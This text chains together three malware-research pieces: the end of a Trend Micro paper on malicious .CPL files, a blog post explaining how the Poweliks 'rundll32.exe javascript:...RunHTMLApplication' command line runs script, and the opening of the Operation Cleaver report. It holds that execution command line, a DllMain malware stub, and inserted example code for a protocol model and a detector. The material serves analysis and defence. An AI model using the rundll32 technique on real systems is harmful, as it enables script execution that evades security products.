The code above is programmatically valid. It ignores all of the parameters received and runs the malicious part. A security analyst should understand all of the concepts above to properly analyze a malicious .CPL file.

Malware does not need to wait for a CPlApplet call because a .CPL file is a DLL. Its DllMain function is called first, by the LoadLibrary function, so the following is also possible:

    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
    {
        // malicious code
        return 0;
    }

Some packed CPL malware also use code in DllMain to unpack themselves.

Analyzing .CPL Files

Static Analysis

A .CPL file is a .DLL file, so the PE32/PE32+ format specification also applies. To identify a .CPL file, look at its extension even if it looks untrustworthy, since the extension is merely part of the file name and may not reflect the real file type. Without the .CPL extension, the file will not load when double-clicked. General .PE file analyzers or editors should work well with .CPL files as long as they are not packed, encrypted, or using anti-reverse-engineering techniques. In the case of packed files, for instance, the CPlApplet function of some .CPL files is not properly exported until the file is loaded and unpacked in memory. The static analysis should be similar to a regular .PE file analysis, so sections with strange characteristics can be checked, file entropy can be calculated, and so forth.
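The message protocol described above, as an added example that is not code from the Trend Micro paper: a portable C model of a well-formed CPlApplet beside the degenerate "return 1 to everything" shape, driven by a host loop that sends the same message sequence control.exe (or a per-message loader like the paper's cpload) would send. The CPL_* constants are the values from the Windows SDK header cpl.h; the HWND/LPARAM typedefs, the CPLINFO layout, and the idea of counting applets that never fill in CPLINFO as a protocol violation are my assumptions, chosen so the model compiles and runs outside Windows.

```c
/* Added example (not from the Trend Micro paper): a portable model of the
 * Control Panel applet message protocol. CPL_* values are those of cpl.h;
 * the Win32 typedefs below are stand-ins so this builds on any platform. */
#include <stdio.h>
#include <string.h>

#define CPL_INIT      1
#define CPL_GETCOUNT  2
#define CPL_INQUIRE   3
#define CPL_SELECT    4
#define CPL_DBLCLK    5
#define CPL_STOP      6
#define CPL_EXIT      7

typedef long LONG;
typedef unsigned int UINT;
typedef long LPARAM;
typedef void *HWND;

/* CPLINFO as filled by a CPL_INQUIRE handler: resource ids for the icon,
 * name and description strings, plus applet-private data. */
typedef struct { int idIcon; int idName; int idInfo; LONG lData; } CPLINFO;

typedef LONG (*CPLAPPLET_FN)(HWND, UINT, LPARAM, LPARAM);

/* A well-formed applet module hosting two Control Panel items. */
LONG good_applet(HWND hwnd, UINT msg, LPARAM lParam1, LPARAM lParam2) {
    (void)hwnd;
    switch (msg) {
    case CPL_INIT:     return 1;            /* nonzero: initialised OK */
    case CPL_GETCOUNT: return 2;            /* number of applets hosted */
    case CPL_INQUIRE: {                     /* lParam1 = index, lParam2 = CPLINFO* */
        CPLINFO *info = (CPLINFO *)lParam2;
        info->idIcon = 100 + (int)lParam1;  /* assumed resource ids */
        info->idName = 200 + (int)lParam1;
        info->idInfo = 300 + (int)lParam1;
        info->lData  = 0;
        return 0;
    }
    case CPL_DBLCLK:   return 0;            /* would show applet lParam1's dialog */
    default:           return 0;            /* CPL_SELECT, CPL_STOP, CPL_EXIT, ... */
    }
}

/* The degenerate shape the paper describes: every message is ignored and
 * the function returns 1 regardless of what was asked. */
LONG stub_applet(HWND hwnd, UINT msg, LPARAM lParam1, LPARAM lParam2) {
    (void)hwnd; (void)msg; (void)lParam1; (void)lParam2;
    return 1;
}

/* Drive an applet through the sequence a Control Panel host uses:
 * INIT, GETCOUNT, INQUIRE per applet, STOP per applet, EXIT.
 * Returns the applet count the module claimed, or -1 if CPL_INIT failed.
 * *violations counts INQUIRE calls that left CPLINFO untouched, i.e.
 * applets the module claims to host but never describes. */
int drive_applet(CPLAPPLET_FN applet, int *violations) {
    int count, i, bad = 0;
    if (applet(NULL, CPL_INIT, 0, 0) == 0) return -1;
    count = (int)applet(NULL, CPL_GETCOUNT, 0, 0);
    for (i = 0; i < count; i++) {
        CPLINFO info, zero;
        memset(&info, 0, sizeof info);
        memset(&zero, 0, sizeof zero);
        applet(NULL, CPL_INQUIRE, i, (LPARAM)&info);
        if (memcmp(&info, &zero, sizeof info) == 0) bad++;
    }
    for (i = 0; i < count; i++) applet(NULL, CPL_STOP, i, 0);
    applet(NULL, CPL_EXIT, 0, 0);
    if (violations) *violations = bad;
    return count;
}

/* Number of claimed applets that never described themselves (-1 if init failed). */
int protocol_violations(CPLAPPLET_FN applet) {
    int v = 0;
    return drive_applet(applet, &v) < 0 ? -1 : v;
}

int main(void) {
    printf("good_applet: %d applets, %d undescribed\n",
           drive_applet(good_applet, NULL), protocol_violations(good_applet));
    printf("stub_applet: %d applets, %d undescribed\n",
           drive_applet(stub_applet, NULL), protocol_violations(stub_applet));
    return 0;
}
```

The host loop is the useful part for an analyst: a module whose CPlApplet answers every message with the same value still "passes" CPL_INIT and reports one applet, but never fills in CPLINFO, which is exactly the behavioural gap that separates the stub shape from a real applet during dynamic analysis.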
It is uncommon to see a packed or encrypted nonmalicious .CPL file.

Figure 7: Exported functions of a nonmalicious joy.cpl file shipped with Windows 7

Dynamic Analysis

Although it can be a little bit tricky, it is possible to debug rundll32.exe when it calls shell32.dll,Control_RunDLL in order to analyze the code inside a .CPL file. To assist in this effort, we created a CPL loader with the following options:

    Usage: cpload [-m MESSAGE]

    If -m is present, MESSAGE should be:

    Option        Message
    -------------------------
    init          CPL_INIT
    getcount      CPL_GETCOUNT
    inquire       CPL_INQUIRE
    select        CPL_SELECT
    dblclk        CPL_DBLCLK
    stop          CPL_STOP
    exit          CPL_EXIT
    newinquire    CPL_NEWINQUIRE
    startwparms   CPL_STARTWPARMS

    Otherwise, cpload will send all messages to CPlApplet()

All that's necessary is to call the CPlApplet function of a .CPL file sample and pass a message on. Another option is to debug the control.exe process, passing the .CPL file path as an argument as follows:

    control.exe myfile.cpl

Cpload.exe calls the LoadLibrary and CPlApplet functions. You need to set the .CPL file path as an argument and set a breakpoint on the ASCII and Unicode LoadLibrary calls (i.e., BP LoadLibraryA and LoadLibraryW, respectively). The following is an example that uses the OllyDbg Command Bar plug-in.

Figure 8: Argument set as the .CPL file path with a breakpoint in LoadLibraryW

How Cybercriminals Use .CPL Files

.CPL files are very flexible. They can be used to host any sort of application, malicious or not. Cybercriminals take advantage of this to spread different kinds of malware. However, most CPL malware, especially in Brazil, appear to be banking Trojan droppers.

Figure 9: Banking Trojan file types in Brazil, March-November 2013

Trend Micro analyzed and now detects more than 4 million different malicious .CPL files via the Trend Micro™ Smart Protection Network™ infrastructure.
Note the following interesting data on CPL malware from 2011 to 2013.

Brazil

• First generic CPL malware detection: May 1, 2011
• First CPL malware family identified: TROJ_SEFNIT [6]
• First TROJ_BANLOAD sample identified: August 18, 2011

[6] Trend Micro Incorporated. (2013). Threat Encyclopedia. "TROJ_SEFNIT." Last accessed January 13, 2014, http://about-threats.trendmicro.com/Search.aspx?language=au&p=TROJ_SEFNIT.

Figure 10: Number of CPL malware detections in Brazil from 2011 to 2013

Figure 11: CPL malware family distribution, excluding generic detections, in Brazil from 2011 to 2013

Worldwide

• First generic CPL malware detection: May 1, 2011 in Japan
• First CPL malware family identified: TROJ_KAZY in the U.S. [7]
• Total number of CPL malware detections, including generic ones, from 2011 to 2013: 20,697,046
• Number of CPL malware detections, excluding generic ones, from 2011 to 2013: 12,410,977

Figure 12: Number of CPL malware detections worldwide from 2011 to 2013

In one case, a file named "Cobrança.cpl," detected as TROJ_BANLOAD.KMZ, was downloaded onto computers after a link embedded in an email was clicked. [8] The code inside the .CPL file dropped a file named "taskhost.exe," detected as TSPY_BANKER.WAV. [9] This malware was then added to the Windows auto-start process and opened the Microsoft site. The next time an infected computer is rebooted, the banking Trojan is also executed.

[7] Trend Micro Incorporated. (2013). Threat Encyclopedia. "TROJ_KAZY." Last accessed January 13, 2014, http://about-threats.trendmicro.com/Search.aspx?language=au&p=TROJ_KAZY.
[8] Trend Micro Incorporated. (2013). Threat Encyclopedia. "TROJ_BANLOAD.KMZ." Last accessed January 13, 2014, http://about-threats.trendmicro.com/malware.aspx?language=au&name=TROJ_BANLOAD.KMZ.
[9] Trend Micro Incorporated. (2013). Threat Encyclopedia. "TSPY_BANKER.WAV." Last accessed January 13, 2014, http://about-threats.trendmicro.com/malware.aspx?language=au&name=TSPY_BANKER.WAV.

Conclusion

We have seen some malware outbreaks featuring .SCR, .VBS, and other file types in Brazil before. Right now, we are seeing a CPL malware outbreak in the country. As with any other type of malware, CPL Trojan infections can be prevented. Note the following .CPL file characteristics:

• .CPL files do not commonly spread throughout networks.
• Apart from Windows applications, some driver vendors also ship .CPL files to get their applets onto the Windows Control Panel.
• The majority of malicious .CPL files that originated from Brazil appear to have been written using the Delphi programming language.
• CPL malware are mainly distributed compressed using the ZIP or RAR algorithm. These compressed files, however, normally only contain malicious .CPL files. Note, though, that the .CPL files themselves can be packed or encrypted when distributed.

As shown, the situation is critical because the current number of malicious .CPL files is large and continues to increase constantly. Cybercriminals can do everything with .CPL files.
They can be turned from droppers to rootkit installers. .CPL is, therefore, a flexible and reliable executable file format that we should worry about. Appendix OSs That Support .CPL File Execution \xe2\x80\xa2 Windows 2012 \xe2\x80\xa2 Windows 8 \xe2\x80\xa2 Windows 2008 \xe2\x80\xa2 Windows 7 \xe2\x80\xa2 Windows 2003 \xe2\x80\xa2 Windows Vista\xc2\xae \xe2\x80\xa2 Windows CE \xe2\x80\xa2 Windows 2000 \xe2\x80\xa2 Windows XP \xe2\x80\xa2 Windows ME \xe2\x80\xa2 Windows 98\xc2\xae \xe2\x80\xa2 Windows NT \xe2\x80\xa2 Windows 95\xc2\xae \xe2\x80\xa2 Windows 3.11 \xe2\x80\xa2 Windows 3.1 Trend Micro | CPL Malware 15 Top 20 Words Associated with CPL Banking Trojans 1. pdf 2. boleto (billet) 3. comprovante (receipt) 4. fiscal 5. nf (invoice) 6. nfe (electronic invoice) 7. nota (invoice) 8. visualizar (view) 9. dsc (commonly part of image file names like \xe2\x80\x9cDSC0001.jpg\xe2\x80\x9d) 10. eletronica (electronic) 11. anexo (attachment) 12. arqv (file) 13. fatura (bill) 14. deposito (deposit) 15. cheque (check) 16. via 17. cobranca (bill) 18. fotos (photos) 19. doc 20. comentariodevoz (voice comment) Trend Micro Incorporated, a global leader in security software, strives to make the world safe for exchanging digital information. Our innovative solutions for consumers, businesses and governments provide layered content security to protect information on mobile devices, endpoints, gateways, servers and the cloud. All of our solutions are powered by cloud-based global threat intelligence, the Trend Micro\xe2\x84\xa2 Smart Protection Network\xe2\x84\xa2, and are supported by over 1,200 threat experts around the globe. For more information, visit www.trendmicro.com. \xc2\xa92014 by Trend Micro, Incorporated. All rights reserved. Trend Micro and the Trend Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. All other product or company names may be trademarks or registered trademarks of their owners. 10101 N. De Anza Blvd. 
Poweliks – Command Line Confusion
20 Aug 2014, posted at 16:46h in Technical Notes by Benkow_

Recently, hFireF0X provided a detailed walkthrough on the reverse engineering forum kernelmode.info about the Win32/Poweliks malware. The particularity of this malware is that it resides in the Windows registry and uses rundll32.exe to execute JavaScript code. I found it funny that we can execute some JavaScript through Rundll32, and obviously I was not the only one.

When we first saw the command line executing JavaScript, we wondered how it worked. In this blog post, we analyze how and why JavaScript is executed when calling this simple command line:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('foo');

Reminder about Rundll32

Rundll32 usage is documented on MSDN; it is used to call an exported function of a DLL file, which can be achieved with the following command line:

RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>

entrypoint is the exported function; its prototype must be:

void CALLBACK EntryPoint(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow);

The lpszCmdLine parameter is given the value specified on the rundll32 command line. We will try to figure out how Rundll32 is able to call the function RunHTMLApplication exported by the library mshtml.dll, and how the "javascript:" prefix is used to execute actual JavaScript code.

Analysis of Rundll32

PARAMETERS

One of the first things done by Rundll32 is to parse the command line in the internal function ParseCommand. This function searches for a comma (',', 0x2C) to locate the DLL name and for a space (' ', 0x20) to locate the entrypoint name.

When using our sample command line, ParseCommand returns javascript:"\..\mshtml as the DLL name and RunHTMLApplication as the entrypoint.
In this context, the space after RunHTMLApplication delimits the 'optional arguments' part of the rundll32 command line.

DLL LOADER

Rundll32 makes several attempts to load the actual DLL from the initial specification javascript:"\..\mshtml. The first test uses the function GetFileAttributes("javascript:"\..\mshtml"). This function eventually accesses C:\Windows\system32\mshtml. As this file is not found, the function returns -1.

SearchPath is then invoked to resolve the DLL name. This function reads the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeProcessSearchMode. The Microsoft definition of this key is:

When the value of this REG_DWORD registry value is set to 1, SearchPath first searches the folders that are specified in the system path, and then searches the current working folder. When the value of this registry value is set to 0, the computer first searches the current working folder, and then searches the folders that are specified in the system path. The system default value for this registry key is 0.

By default this registry key doesn't exist (on Windows XP / 7 / 8), so SearchPath tries to load the file mshtml from the current directory of rundll32 (c:\windows\system32) before looking for it in the system path.

All these attempts fail and rundll32 moves to the next step. GetFileAttributes is called again, this time searching for the manifest of the module: javascript:"\..\mshtml.manifest

Since all the previous steps failed, Rundll32 eventually calls LoadLibrary("javascript:"\..\mshtml"). LoadLibrary is just a thin wrapper around LdrLoadDll, located in ntdll.dll.
Internally, LdrLoadDll adds the default extension .dll and parses the resulting string javascript:"\..\mshtml.dll as a path. The token .. instructs it to go one folder up, so the string resolves to mshtml.dll (think of foo\..\mshtml.dll resolving to mshtml.dll). With the mshtml.dll specification, LdrLoadDll is able to load the library from the system directory.

Rundll32 then calls GetProcAddress with the previously extracted entry point name RunHTMLApplication. For the moment, the javascript: prefix seems pretty useless: LoadLibrary("foobar:\"\..\mshtml") works fine. So, why prefix with javascript:?

PROTOCOLS HANDLER

Once the entry point address has been resolved, Rundll32 calls the function mshtml.dll!RunHTMLApplication. Although it is not documented, the actual prototype of RunHTMLApplication can be inferred from the call made by c:\windows\system32\mshta.exe (the application dedicated to launching .hta files):

HRESULT RunHTMLApplication(HINSTANCE hinst, HINSTANCE hPrevInst, LPSTR szCmdLine, int nCmdShow);

This is not far from the function prototype expected for a rundll32 entry point:

void CALLBACK EntryPoint(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow);

RunHTMLApplication receives a handle to a window instead of a handle to a module as the first parameter. This parameter is used when mshtml registers a window class and creates a window of this new class. Passing a value that does not correspond to an actual instance doesn't seem to disturb user32 very much… The second parameter is not used at all, so the mismatch is not important. The last parameter, nCmdShow, is used by RunHTMLApplication to display the window hosting the HTML application. Rundll32 always calls the entry point function with the value SW_SHOWDEFAULT, which instructs any window that may be opened to use the default window placement.
The main parameter of interest is lpszCmdLine (";alert('foo') in our case).

This obviously leads to an issue, since this is not a valid JavaScript statement (note the missing double quote at the end of the statement). But it works anyway, because RunHTMLApplication ignores the given parameter and instead requests the original command line again from the GetCommandLine Windows API (wrapped in a call to the GetCmdLine function).

The full command line contains the name of the executable and the parameters; GetCmdLine extracts the parameters by removing the executable specification.

After that, RunHTMLApplication calls CreateUrlMoniker. This is where the string « javascript: » is essential. CreateUrlMoniker parses the command line to extract the string before the character ":" (0x3A): "javascript".

CreateUrlMoniker crawls the registry key HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\. These keys refer to a set of protocols and their CLSIDs. CreateUrlMoniker finds an appropriate protocol handler for the JavaScript protocol (HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\javascript). The CLSID {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} matches « Microsoft HTML Javascript Pluggable Protocol ».

It is for this reason that the string "javascript" is essential at the beginning of the parameters.
The same mechanism comes into play when one types javascript:alert('foo'); in the Internet Explorer navigation bar.

The remainder of the string located after the ':' separator is interpreted by the JavaScript URL moniker as JavaScript instructions:

"\..\mshtml,RunHTMLApplication ";alert('foo');

This is valid JavaScript, with a string "\..\mshtml,RunHTMLApplication " (hence the double quote that was skipped in all the previous steps!) and a function call (alert). Finally, RunHTMLApplication calls CHTMLApp::Run and the JavaScript is executed.

Security point

From a security point of view, executing JavaScript through Rundll32 is like executing an HTML Application. In other words, we have all the power of Internet Explorer—its object model, performance, rendering power and protocol support—without the strict security model and user interface of the browser being enforced. Zone security is off, cross-domain script access is allowed, and we have read/write access to the files and system registry on the client machine. With this trick, JavaScript is executed outside the Internet Explorer process, and the script is not subject to security mechanisms such as Protected Mode / sandboxing on Vista and later.

Conclusion

RunHTMLApplication has the perfect prototype to work with Rundll32. The attackers have made great efforts to build a command line with the perfect syntax for passing through all the mechanisms (library loading, command line parsing, URL syntax correctness, valid JavaScript, etc.) leading to JavaScript execution in an uncontrolled environment. From our understanding, this technique allows bypassing some security products that may trust actions performed by the built-in rundll32, while specifying the script to run without writing any file to the file system.
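The parsing chain traced above (ParseCommand, LdrLoadDll, GetCmdLine, CreateUrlMoniker) as a defender's check over process-creation command lines, written as an added example that is not part of the original post. The sample command lines, the helper names and the flagging rules are this example's own assumptions; it generalizes the post's case by flagging any multi-character URL scheme in the DLL specification, not only javascript:.

```python
"""Added example (not from the original post): a detector that mirrors the parsing
order the post describes for rundll32 and RunHTMLApplication, run over constructed
process-creation command lines.  Helper names and samples are constructed."""
from dataclasses import dataclass, field

# Protocol name the post traces to HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\javascript.
SCRIPT_PROTOCOLS = {"javascript"}


@dataclass
class Rundll32Call:
    dll_spec: str          # DLL text exactly as ParseCommand returns it
    resolved_dll: str      # after the LdrLoadDll-style '.dll' append and '..' collapse
    entrypoint: str
    arguments: str         # the 'optional arguments' part, i.e. lpszCmdLine
    protocol: str          # text before the first ':' of the post-executable command line
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def strip_executable(cmdline: str) -> str:
    """GetCmdLine-style clean-up: drop the program token (quoted or not)."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].lstrip() if end != -1 else ""
    _, _, rest = s.partition(" ")
    return rest.lstrip()


def parse_command(args: str):
    """ParseCommand: the first ',' (0x2C) ends the DLL name, the next ' ' (0x20) ends
    the entry-point name; whatever follows is the optional argument string."""
    dll, sep, rest = args.partition(",")
    if not sep:
        return dll.strip(), "", ""
    entry, _, optional = rest.partition(" ")
    return dll.strip(), entry.strip(), optional


def resolve_dll(dll_spec: str) -> str:
    """LdrLoadDll-style: append '.dll' when the extension is missing, then walk the
    path so that each '..' discards the preceding segment.  The post's
    javascript:"\\..\\mshtml therefore collapses to mshtml.dll."""
    name = dll_spec if dll_spec.lower().endswith(".dll") else dll_spec + ".dll"
    segments = []
    for seg in name.replace("/", "\\").split("\\"):
        if seg == "..":
            if segments:
                segments.pop()
        elif seg and seg != ".":
            segments.append(seg)
    return "\\".join(segments)


def protocol_prefix(args: str) -> str:
    """CreateUrlMoniker takes everything before the first ':' (0x3A) as the scheme."""
    head, sep, _ = args.partition(":")
    return head.strip().strip('"').lower() if sep else ""


def analyze(cmdline: str) -> Rundll32Call:
    args = strip_executable(cmdline)
    dll_spec, entry, optional = parse_command(args)
    resolved = resolve_dll(dll_spec)
    proto = protocol_prefix(args)
    call = Rundll32Call(dll_spec, resolved, entry, optional, proto)

    basename = resolved.rsplit("\\", 1)[-1].lower()
    if basename == "mshtml.dll" and entry.lower() == "runhtmlapplication":
        call.reasons.append("mshtml!RunHTMLApplication reached through rundll32")
    # A drive letter is a single character before ':'; anything longer is a URL
    # scheme that CreateUrlMoniker will look up under PROTOCOLS\Handler.
    if len(proto) > 1:
        call.reasons.append(f"URL scheme '{proto}:' in the DLL specification")
    if proto in SCRIPT_PROTOCOLS:
        call.reasons.append("script protocol handler selected by CreateUrlMoniker")
    if ".." in dll_spec:
        call.reasons.append("parent-directory traversal in the DLL specification")
    return call


# Constructed process-creation command lines for the demonstration.
SAMPLE_COMMAND_LINES = [
    # The Poweliks launcher analysed in the post.
    r'''rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('foo');''',
    # Benign: Control Panel applet launcher.
    r"rundll32.exe shell32.dll,Control_RunDLL",
    # Benign: mshtml used for its print entry point with a normal file path.
    r'rundll32.exe C:\Windows\System32\mshtml.dll,PrintHTML "C:\Temp\report.html"',
]


def flagged(cmdlines):
    """Return the analyses that tripped at least one reason."""
    return [c for c in map(analyze, cmdlines) if c.suspicious]


if __name__ == "__main__":
    for call in map(analyze, SAMPLE_COMMAND_LINES):
        verdict = "SUSPICIOUS" if call.suspicious else "ok"
        print(f"{verdict:10} dll={call.resolved_dll!r} entry={call.entrypoint!r} "
              f"protocol={call.protocol!r} reasons={call.reasons}")
```

The check is deliberately a mirror of the steps in the post, so quoting rules that rundll32 applies beyond what the post covers are not modelled.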
That's all folks!

Tags: MALWARE POWELIKS WIN32

Benoit Ancel

10 Comments

Mark Beihoffer, posted at 22:48h, 02 September:
I think I'm going to have to go lie down after reading *this*. Every day I thank my lucky stars I am no longer a Windows systems administrator. I may have to inform some of my friends about the insightful comments you've made here. They make future network architecture purchasing decisions & I do believe that their next round of investments will focus primarily on BSD systems, possibly augmented by Debian or Ubuntu machines. Thanks so much for your research.

mbeihoffer, posted at 23:05h, 02 September:
Thanks for sharing this. I have to alert my friends about this, so they don't keep buying all these copies of Microsoft Windows Advanced Data Center Edition 768-core licenses. I mean, the first few times they cashed out our pension fund & laid off a third of the I.T. department, it was funny. But then spending all that pension money on some sort of weird Windows cluster running on a subterranean blade server farm, plus their propensity to spend a lot of time & money buying 32-core Oracle licenses, so it at least would *look* like they are busy doing something, well. After I left the industry I decided to take some time off. I don't have to maintain Windows systems any more in my new position, & even though I'm not making the kind of money I did when I was a network architect, well. Articles like this one no longer give me heart palpitations & panic attacks, so that's a plus. On the other hand, I'm continually surprised at how many friends & acquaintances I have that, although most of them are eager to switch to Mac OS X or Apple iOS devices, or in some cases, even seem excited about Ubuntu Linux & Debian GNU/Linux. It's just a really, really slow process.
Anyway, thanks so much for the enlightening research & helpful article. It got me to thinking; maybe I should pick up one of my friend's $25.00 special, refurbished Windows 7 systems, complete with flat panel monitor & what-have-you. It would be fun to put it behind a transparent bridging OpenBSD firewall, & take advantage of _tcpdump_ & ettercap, pf, & so forth. Basically, I would be sacrificing the Windows machine by connecting it to the Internet, but since I'd be able to sniff the network traffic & analyze the various infectious agents as they worked their way into the new machine. Sort of… like an aquarium, for worms, viruses, backdoors, rootkits, dll injection attacks, privilege escalation attacks, & so forth. It would be the only Windows machine on the network, which is actually pretty comforting at this point, but I bet the various autonomous agents & R.A.T. ops would at least give me a little bit of entertainment as I futz with it. I always thought the best rootkits were developed in ObjectiveCaml, asm, & good old C, but I guess if rundll32 & so forth are into JavaScript now, well. Who am I to judge. Anyway, it's been fun reading your site, but I've got to run now & see how my new GitHub repository is doing.

Johnd61, posted at 13:15h, 12 October:
Just wanna input on a few general things: the website pattern is perfect, the subject material is really excellent. "Believe those who are seeking the truth. Doubt those who find it." by Andre Gide.
Pingback: 分享一些不错国外技术文章 (Sharing some good foreign technical articles) | 安全盒子, posted at 11:23h, 29 December:
[…] poweliks command line confusion LINK […]

Pingback: JavaScript后门深层分析 (In-depth analysis of a JavaScript backdoor) | z7y Blog, posted at 05:00h, 12 January:
[…] links: http://thisissecurity.net/2014/08/20/poweliks-command-line-confusion/ […]

Pingback: JavaScript后门深层分析 (In-depth analysis of a JavaScript backdoor) | D ' blog, posted at 00:32h, 16 January:
[…] links: http://thisissecurity.net/2014/08/20/poweliks-command-line-confusion/ […]

Pingback: Being Infected with Fileless Malware | TheSecurityBlogger, posted at 18:18h, 27 May:
[…] loaded is actually javascript; this behavior is well documented for Poweliks such as in the article Poweliks – Command Line Confusion.
Notice the activity following the LdrLoadDll function call is trying to locate the address for the […]

Pingback: 揭秘基于注册表隐藏的无文件攻击 (Unveiling registry-hidden fileless attacks) | 安全盒子, posted at 12:38h, 07 July:
[…] [1]https://thisissecurity.net/2014/08/20/poweliks-command-line-confusion/ […]

Pingback: 揭秘基于注册表隐藏的无文件攻击 (Unveiling registry-hidden fileless attacks) | 红色战线, posted at 06:03h, 11 July:
[…] [1]https://thisissecurity.net/2014/08/20/poweliks-command-line-confusion/ […]

mywebsite, posted at 17:02h, 03 February:
I got this site from my friend who informed me about this site, and now this time I am browsing this web site and reading very informative posts at this time.
OPERATION CLEAVER
#OPCLEAVER

"Iran should be considered a first-tier cyber power."
Gabi Siboni, Israel Institute for National Security Studies cybersecurity expert

"Iran has rapidly gained near parity with the Chinese but may be closer to the Russians in terms of swagger."
Retired Admiral William J. Fallon, Former Commander CENTCOM

"Global critical infrastructure organizations need to take this threat seriously. The Iranian adversary is real and they're coming, if not already here."
Mark Weatherford, Former Deputy Under Secretary for Cybersecurity at the US Department of Homeland Security

"Yes, China and one or two others can shut down our power grids."
Admiral Michael Rogers, Director of the National Security Agency and head of US Cyber Command

"The world has combated cyber threats by doing the same thing over and over again … It's the definition of insanity."
Jeff Moss, Co-Chair DHS Community Resiliency Task Force, Founder of DEFCON and BlackHat

Jalal ad-Din Muhammad Rumi, 13th Century Persian poet, jurist, theologian and Sufi mystic. English translation: "Silence gives answers."

PREVENTION IS EVERYTHING
A personal note from Cylance CEO Stuart McClure

On February 24, 1989, United Flight 811 left Honolulu, Hawaii, on its way to Auckland, New Zealand, with 364 souls on board. Somewhere between 23,000 and 24,000 feet an enormous explosion ejected nine passengers into the dark void over the Pacific Ocean.1 This aviation disaster was later determined to have been caused by a simple design flaw combined with the lack of corrective action.
Boeing and the FAA had known about this problem for over one year prior to the accident. The result: nine people lost their lives. The other 337 passengers plus 18 crew members who survived live with the memory every day, all of it due to a highly preventable design flaw. As a 19-year-old young adult, I was grateful to have survived, but I had no idea how that single event would impact my future in such a profound way. Much of my passion for cybersecurity can be directly attributed to that fateful day. The United Flight 811 accident proves just how important it is to detect flaws before tragedy strikes. Preventable disasters like this are what motivate the Cylance team to create a safer world. We do everything we can to uncover the flaws in technologies before they damage the physical or cyber world. Our mission is simple: to protect the world. This report is an attempt to deliver on that mission.

After tracking hackers both personally and professionally for more than 26 years, there is no doubt in my mind that the release of the information contained in the Operation Cleaver report is vital to the security of the world's critical infrastructure. The focus of the Operation Cleaver report is on one particular Iranian team we've dubbed Tarh Andishan, the infrastructure they utilize, as well as their tactics, techniques and procedures. Roughly translated, "Tarh Andishan" means "thinkers" or "innovators". This team displays an evolved skillset and uses a complex infrastructure to perform attacks of espionage, theft, and the potential destruction of control systems and networks. While our investigation is ongoing, and we presently have limited visibility inside many of the compromised networks, Cylance observed Tarh Andishan actively targeting, attacking, and compromising more than 50 victims since at least 2012.
Cylance is committed to responsible disclosure and has refrained from exaggeration and embellishment in this report, limiting our content to only that which can be definitively confirmed. However, we have speculated on the possible motivations behind these attacks, given our deep knowledge and understanding of the cyber landscape. We have made every effort to notify all affected entities prior to publishing this report. Additionally, all personally identifiable information about the members of Operation Cleaver has been withheld. We don't care who the adversary is, where they work or reside, who they're dating or what party photos they upload to Facebook – all we care about is preventing campaigns like Operation Cleaver from negatively affecting the real world. This report is for the world's cyber defenders – never give up!

Sincerely,
Stuart McClure
CEO/President, Cylance, Inc.

TABLE OF CONTENTS
Executive Summary ..... 5
Background ..... 6
Why the name "Cleaver"? ..... 8
Why Expose Iran Now? ..... 8
Critical Discoveries ..... 9
Targets & Victims ..... 12
Attribution ..... 17
    Attacker IP Addresses ..... 18
    Attacker Domains ..... 19
    Tools & Software ..... 20
    Tarh Andishan ..... 24
    Members ..... 26
    Teams ..... 30
Tactics, Techniques & Procedures (TTPs) ..... 31
    Initial Compromise ..... 32
    Privilege Escalation & Pivoting ..... 36
    Exfiltration ..... 41
    Persistence ..... 47
Mitigation ..... 60
Speculation: The Why ..... 62
Conclusion ..... 65
References ..... 67
About Cylance ..... 68
Cylance Products ..... 69
Cylance Services ..... 70
Acknowledgments ..... 71
The Operation Cleaver Logo ..... 72
Appendix A: Indicators of Compromise (IOC) ..... 73

EXECUTIVE SUMMARY

Since at least 2012, Iranian actors have directly attacked, established persistence in, and extracted highly sensitive materials from the networks of government agencies and major critical infrastructure companies in the following countries: Canada, China, England, France, Germany, India, Israel, Kuwait, Mexico, Pakistan, Qatar, Saudi Arabia, South Korea, Turkey, United Arab Emirates, and the United States.

Iran is the new China. Operation Cleaver has, over the past several years, conducted a significant global surveillance and infiltration campaign. To date it has successfully evaded detection by existing security technologies. The group is believed to work from Tehran, Iran, although auxiliary team members were identified in other locations including the Netherlands, Canada, and the UK. The group successfully leveraged both publicly available and customized tools to attack and compromise targets around the globe. The targets include military, oil and gas, energy and utilities, transportation, airlines, airports, hospitals, telecommunications, technology, education, aerospace, Defense Industrial Base (DIB), chemical companies, and governments.

During intense intelligence gathering over the last 24 months, we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort. As Iran's cyber warfare capabilities continue to morph,2 the probability of an attack that could impact the physical world at a national or global level is rapidly increasing.3 Their capabilities have advanced beyond simple website defacements, Distributed Denial of Service (DDoS) attacks, and Hacking Exposed-style techniques.
With minimal separation between private companies and the Iranian government, their modus operandi seems clear: blur the line between legitimate engineering companies and state-sponsored cyber hacking teams to establish a foothold in the world's critical infrastructure. Iran's rising expertise, along with their choice of victims, has compelled us to release this report sooner than we would have liked in order to expose Operation Cleaver to the world. The evidence and indicators of compromise we provide in this report will allow potentially unaware victims to detect and eliminate Cleaver's incursions into their networks.

BACKGROUND

Iran has been severely impacted by debilitating and extremely advanced malware campaigns since at least 2009. Famous examples of these efforts include industrial sabotage via Stuxnet (2009 - 2010), and espionage with Duqu (2009 - 2011) as well as Flame (2012). These campaigns have targeted Iran's nuclear program, and oil and gas operations. Stuxnet was an eye-opening event for Iranian authorities, exposing them to the world of physical destruction via electronic means.

